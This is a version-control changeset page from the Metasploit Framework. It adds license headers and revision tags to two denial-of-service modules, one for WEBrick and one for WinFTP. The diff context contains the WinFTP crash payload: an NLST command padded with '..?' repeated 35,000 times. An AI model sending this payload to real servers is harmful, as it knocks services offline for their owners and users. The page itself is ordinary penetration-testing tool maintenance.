Changeset 6095

Show
Ignore:
Timestamp:
01/08/09 21:33:26 (6 months ago)
Author:
patrickw
Message:

Added aux filezilla_server_port.rb. Moved dos aux to OS-based folder.

Location:
framework3/trunk/modules/auxiliary/dos
Files:
5 added
2 removed
2 modified

Legend:

Unmodified
Added
Removed
  • framework3/trunk/modules/auxiliary/dos/http/webrick_regex.rb

    r6034 r6095  
     1## 
     2# $Id$ 
     3## 
     4 
     5## 
     6# This file is part of the Metasploit Framework and may be subject to  
     7# redistribution and commercial restrictions. Please see the Metasploit 
     8# Framework web site for more information on licensing and terms of use. 
     9# http://metasploit.com/projects/Framework/  
     10## 
     11 
    112require 'msf/core' 
    213 
     
    1728                        'Author'         => 'kris', 
    1829                        'License'        => MSF_LICENSE, 
    19                         'Version'        => '1', 
     30                        'Version'        => '$Revision$', 
    2031                        'References'     => [ 
    2132                                [ 'BID', '30644'], 
  • framework3/trunk/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb

    r6034 r6095  
     1## 
     2# $Id$ 
     3## 
     4 
     5## 
     6# This file is part of the Metasploit Framework and may be subject to  
     7# redistribution and commercial restrictions. Please see the Metasploit 
     8# Framework web site for more information on licensing and terms of use. 
     9# http://metasploit.com/projects/Framework/  
     10## 
     11 
    112require 'msf/core' 
    213 
     
    1627                        'Author'         => 'kris', 
    1728                        'License'        => MSF_LICENSE, 
    18                         'Version'        => '1', 
     29                        'Version'        => '$Revision$', 
    1930                        'References'     => 
    2031                                [ [ 'URL', 'http://milw0rm.com/exploits/6581'] ], 
     
    2738                raw_send_recv("PASV\r\n") # NLST has to follow a PORT or PASV 
    2839 
    29                 sleep 1 # *sigh* this appears to be necessary in my tests 
     40                sleep(1) # *sigh* this appears to be necessary in my tests 
    3041 
    3142                raw_send("NLST #{'..?' * 35000}\r\n")